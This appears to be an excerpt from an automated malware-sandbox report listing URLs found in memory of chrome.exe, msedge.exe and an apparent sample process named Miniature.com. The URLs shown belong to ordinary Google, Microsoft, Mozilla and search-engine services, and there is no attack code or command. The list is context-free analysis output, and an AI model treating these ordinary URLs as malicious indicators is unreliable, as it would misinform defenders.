                Source: chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: msedge.exe, 00000018.00000002.1847858833.000002B320D71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                Source: Miniature.com, 00000010.00000002.2127699132.0000000004941000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2125663035.0000000001C8B000.00000004.00000020.00020000.00000000.sdmp, A1NG4W.16.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                Source: Miniature.com, 00000010.00000002.2127699132.0000000004941000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2125663035.0000000001C8B000.00000004.00000020.00020000.00000000.sdmp, A1NG4W.16.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                Source: Reporting and NEL.27.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                Source: chrome.exe, 00000015.00000002.1724787435.0000010400760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727840637.0000010400EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723989968.0000010400500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1724301271.000001040061C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
                Source: chrome.exe, 00000015.00000002.1724301271.000001040061C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icoai
                Source: Miniature.com, 00000010.00000002.2127699132.00000000046F4000.00000004.00000800.00020000.00000000.sdmp, 5FCJE3.16.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: chrome.exe, 00000015.00000002.1726956412.0000010400C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                Source: chrome.exe, 00000015.00000002.1726956412.0000010400C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
                Source: Miniature.com, 00000010.00000002.2126606877.000000000463D000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2127699132.00000000046F4000.00000004.00000800.00020000.00000000.sdmp, XTJEKX.16.dr, Web Data.26.dr, 5FCJE3.16.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: chrome.exe, 00000015.00000002.1726798094.0000010400BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
                Source: chrome.exe, 00000015.00000002.1726798094.0000010400BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
                Source: chrome.exe, 00000015.00000002.1726798094.0000010400BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                Source: chrome.exe, 00000015.00000002.1726902512.0000010400C4C000.00000004.00000800.00020000.00000000.sdmp, XTJEKX.16.dr, Web Data.26.dr, 5FCJE3.16.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chrome.exe, 00000015.00000003.1655875411.0000010400D84000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000002.1852071829.000071EC0016C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                Source: chrome.exe, 00000015.00000002.1724467499.00000104006A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
                Source: chrome.exe, 00000015.00000002.1728008581.0000010400F1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1728781717.000001040116C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: chrome.exe, 00000015.00000003.1651763850.0000010400ECC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650672473.000001040033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1673459388.0000010400D18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1656708823.0000010400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650694126.0000010400D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1651721993.0000010400D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1651298316.0000010400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1657519462.00000104012CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1655875411.0000010400D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                Source: chrome.exe, 00000015.00000002.1724467499.00000104006A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorePoCiXPoI=
                Source: chrome.exe, 00000015.00000003.1642129761.000033EC006C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641591808.000033EC003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                Source: chrome.exe, 00000015.00000003.1642129761.000033EC006C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641591808.000033EC003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                Source: chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
                Source: chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641591808.000033EC003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                Source: chrome.exe, 00000015.00000002.1723045820.000001040020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                Source: chrome.exe, 00000015.00000002.1723045820.000001040020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                Source: chrome.exe, 00000015.00000002.1722870036.000001040018C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000002.1852071829.000071EC0016C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.26.drString found in binary or memory: https://chromewebstore.google.com/
                Source: msedge.exe, 00000018.00000002.1852071829.000071EC0016C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/q
                Source: chrome.exe, 00000015.00000002.1727097599.0000010400CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
                Source: chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                Source: chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/_
                Source: chrome.exe, 00000015.00000003.1638059900.00002864002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1638078028.00002864002EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                Source: chrome.exe, 00000015.00000002.1722378153.000001040001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724716741.0000010400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724518566.00000104006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724193686.00000104005C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726902512.0000010400C4C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000002.1851369585.000071EC00040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.26.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: chrome.exe, 00000015.00000002.1725442700.0000010400854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                Source: chrome.exe, 00000015.00000002.1725442700.0000010400854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                Source: chrome.exe, 00000015.00000002.1726390613.0000010400A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                Source: chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                Source: chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                Source: chrome.exe, 00000015.00000002.1724332611.000001040063C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: Miniature.com, 00000010.00000002.2127699132.0000000004941000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2125663035.0000000001C8B000.00000004.00000020.00020000.00000000.sdmp, A1NG4W.16.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: Miniature.com, 00000010.00000002.2127699132.0000000004941000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2125663035.0000000001C8B000.00000004.00000020.00020000.00000000.sdmp, A1NG4W.16.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: chrome.exe, 00000015.00000002.1727769657.0000010400EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                Source: Reporting and NEL.27.drString found in binary or memory: https://deff.nelreports.net/api/report
                Source: Reporting and NEL.27.dr, 2cc80dabc69f58b6_0.26.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: Reporting and NEL.27.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723256333.00000104002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725083338.00000104007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727097599.0000010400CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725185336.000001040080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725083338.00000104007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727097599.0000010400CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725185336.000001040080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725083338.00000104007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727097599.0000010400CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725185336.000001040080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723256333.00000104002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1724787435.0000010400760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727840637.0000010400EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723989968.0000010400500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723256333.00000104002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1724787435.0000010400760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727840637.0000010400EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723989968.0000010400500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000003.1655920834.0000010400450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723566178.0000010400394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1726956412.0000010400C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                Source: chrome.exe, 00000015.00000002.1724301271.000001040061C000.00000004.00000800.00020000.00000000.sdmp, XTJEKX.16.dr, Web Data.26.dr, 5FCJE3.16.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Miniature.com, 00000010.00000002.2126606877.000000000463D000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2127699132.00000000046F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726956412.0000010400C7C000.00000004.00000800.00020000.00000000.sdmp, XTJEKX.16.dr, Web Data.26.dr, 5FCJE3.16.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chrome.exe, 00000015.00000002.1726956412.0000010400C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab6
                Source: chrome.exe, 00000015.00000002.1726956412.0000010400C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                Source: Miniature.com, 00000010.00000002.2126606877.000000000463D000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2127699132.00000000046F4000.00000004.00000800.00020000.00000000.sdmp, XTJEKX.16.dr, Web Data.26.dr, 5FCJE3.16.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.dr, HubApps Icons.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.dr, HubApps Icons.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.dr, HubApps Icons.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.dr, HubApps Icons.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.dr, HubApps Icons.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.dr, HubApps Icons.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.dr, HubApps Icons.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
                Source: chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641591808.000033EC003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641591808.000033EC003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                Source: chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
